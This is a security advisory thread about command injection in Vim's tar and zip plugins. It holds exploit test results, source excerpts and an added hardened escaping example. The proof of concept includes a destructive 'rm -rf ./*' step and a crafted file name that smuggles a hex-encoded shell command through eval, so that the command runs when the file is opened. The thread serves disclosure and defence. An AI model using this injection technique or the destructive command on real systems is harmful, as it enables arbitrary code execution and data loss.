Collection of Vulnerabilities in Fully Patched Vim 7.1

2009-02-23 / 2009-02-24
Credit: Jan Minar
Risk: High
Local: Yes
Remote: No
CWE: CWE-94

On Sat, Jun 14, 2008 at 2:09 PM, Bram Moolenaar <Bram@moolenaar.net> wrote:
>
> Jan Minar wrote:
>
>> 1. Summary
>>
>>   Product  : Vim -- Vi IMproved
>>   Version  : Tested with 7.1.314 and 6.4
>>   Impact   : Arbitrary code execution
>>   Wherefrom: Local and remote
>>   Original : http://www.rdancer.org/vulnerablevim.html
>>
>> Improper quoting in some parts of Vim written in the Vim Script can lead to
>> arbitrary code execution upon opening a crafted file.

> Note that version 7.1.314, as reported in the Summary, does not have
> most of the reported problems.  The problems in the plugins have also
> been fixed, this requires updating the runtime files.  Information about
> that can be found at http://www.vim.org/runtime.php

I do apologize: as written in the advisory, the version I worked with was
7.1.298.  7.1.314 was only partly vulnerable.  FWIW, I have updated the
advisory at http://www.rdancer.org/vulnerablevim.html .

Thanks to Bram for all the good work.  7.2a.10 with updated runtime is still
vulnerable to the zipplugin attack, and an updated tarplugin attack:

    -------------------------------------------
    -------- Test results below ---------------
    -------------------------------------------
    filetype.vim
      strong  : EXPLOIT FAILED
      weak    : EXPLOIT FAILED
    tarplugin : EXPLOIT FAILED
    tarplugin.updated: VULNERABLE
    zipplugin : VULNERABLE
    xpm.vim
      xpm     : EXPLOIT FAILED
      xpm2    : EXPLOIT FAILED
      remote  : EXPLOIT FAILED
    gzip_vim  : EXPLOIT FAILED
    netrw     : EXPLOIT FAILED

The original tarplugin exploit now produces a string of telling error
messages:

    /bin/bash: so%: command not found
    tar: /home/rdancer/vuln/vim/tarplugin/sploit/foo'|sosploit/foo: Cannot open: No such file or directory
    tar: Error is not recoverable: exiting now
    /bin/bash: retu: command not found
    /bin/bash: bar.tar|retu|'bar.tar: command not found

It's easy to see that it is still possible to execute arbitrary shell
commands.

$VIMRUNTIME/autoload/tar.vim of Vim 7.2a.10:

      136   if tarfile =~# '\.\(gz\|tgz\)$'
      137 "   call Decho("1: exe silent r! gzip -d -c ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - ")
     *138    exe "silent r! gzip -d -c -- ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - "
      139   elseif tarfile =~# '\.lrp'
      140 "   call Decho("2: exe silent r! cat -- ".s:Escape(tarfile)."|gzip -d -c -|".g:tar_cmd." -".g:tar_browseoptions." - ")
     *141    exe "silent r! cat -- ".s:Escape(tarfile)."|gzip -d -c -|".g:tar_cmd." -".g:tar_browseoptions." - "
      142   elseif tarfile =~# '\.bz2$'
      143 "   call Decho("3: exe silent r! bzip2 -d -c ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - ")
     *144    exe "silent r! bzip2 -d -c -- ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - "
      145   else
      146 "   call Decho("4: exe silent r! ".g:tar_cmd." -".g:tar_browseoptions." ".s:Escape(tarfile))
    **147    exe "silent r! ".g:tar_cmd." -".g:tar_browseoptions." ".s:Escape(tarfile)
    [...]
      444 fun s:Escape(name)
      445   " shellescape() was added by patch 7.0.111
      446   if exists("*shellescape")
      447    let qnameq= shellescape(a:name)
      448   else
      449    let qnameq= g:tar_shq . a:name . g:tar_shq
      450   endif
      451   return qnameq
      452 endfun

(*)  s:Escape() does not suffice, as it fails to escape ``%'' and friends.
(**) tar(1) allows arbitrary command execution via options
     ``--to-command'', and ``--use-compress-program''.

The updated tarplugin attack is rather simple:

    $ rm -rf ./*
    $ touch "foo%;eval eval \`echo 0:64617465203e2070776e6564 | xxd -r\`;'bar.tar"
    $ vim +:q ./foo*
    $ ls -l pwned
    -rw-r--r-- 1 rdancer users 29 2008-07-01 20:18 pwned

Cheers,
Jan Minar.
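The quoting gap marked (*) and the option problem marked (**) in the message above, shown from the defender's side. This is an added example, not part of the original message or of Vim's runtime files; the function names are hypothetical, and it assumes a Unix shell and a Vim build whose shellescape() accepts the optional {special} argument and which provides assert_equal().

```vim
" Added example, not code from autoload/tar.vim. All function names are
" hypothetical; the file names used in the self-check are constructed.

" Quote a file name for use inside an :execute'd ':r !' command.
" Such a command is parsed twice: Vim first expands its own
" command-line items (%, #, !, <cword>, ...), then the shell parses
" the result. Plain shellescape(name) only protects the second pass.
function! HardenedEscape(name) abort
  if !exists('*shellescape')
    " No safe fallback: refuse rather than wrap the name in bare quotes.
    throw 'HardenedEscape: shellescape() unavailable'
  endif
  " A non-zero second argument also backslash-escapes the items Vim
  " itself would expand; ':!' strips those backslashes again.
  return shellescape(a:name, 1)
endfunction

" Build the archive listing command for a given path.
function! HardenedTarList(tarfile) abort
  let l:path = a:tarfile
  " A name that begins with '-' could be read by tar as an option.
  " Anchoring it with './' keeps it a path.
  if l:path =~# '^-'
    let l:path = './' . l:path
  endif
  return 'silent r! tar -tf ' . HardenedEscape(l:path)
endfunction

" Self-check on harmless constructed names. Returns v:errors, which is
" empty when every expectation holds.
function! HardenedSelfCheck() abort
  let l:name = 'foo%bar.tar'
  " Shell-only quoting leaves '%' in place for Vim to expand.
  call assert_equal("'foo%bar.tar'", shellescape(l:name))
  " With {special} set, '%' reaches the shell as a literal character.
  call assert_equal("'foo\\%bar.tar'", HardenedEscape(l:name))
  call assert_equal("silent r! tar -tf './-x.tar'", HardenedTarList('-x.tar'))
  return v:errors
endfunction
```

Source the file and run `:echo HardenedSelfCheck()`; an empty list means all three expectations held.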

References:

http://www.rdancer.org/vulnerablevim.html
http://www.rdancer.org/vulnerablevim-shellescape.html
http://www.openwall.com/lists/oss-security/2008/10/20/2
http://www.openwall.com/lists/oss-security/2008/10/15/1
http://www.openwall.com/lists/oss-security/2008/08/01/1
http://www.openwall.com/lists/oss-security/2008/07/15/4
http://www.openwall.com/lists/oss-security/2008/07/13/1
http://www.openwall.com/lists/oss-security/2008/07/10/7
http://www.openwall.com/lists/oss-security/2008/07/08/12
http://www.openwall.com/lists/oss-security/2008/07/07/4
http://www.openwall.com/lists/oss-security/2008/07/07/1
http://marc.info/?l=bugtraq&m=121494431426308&w=2

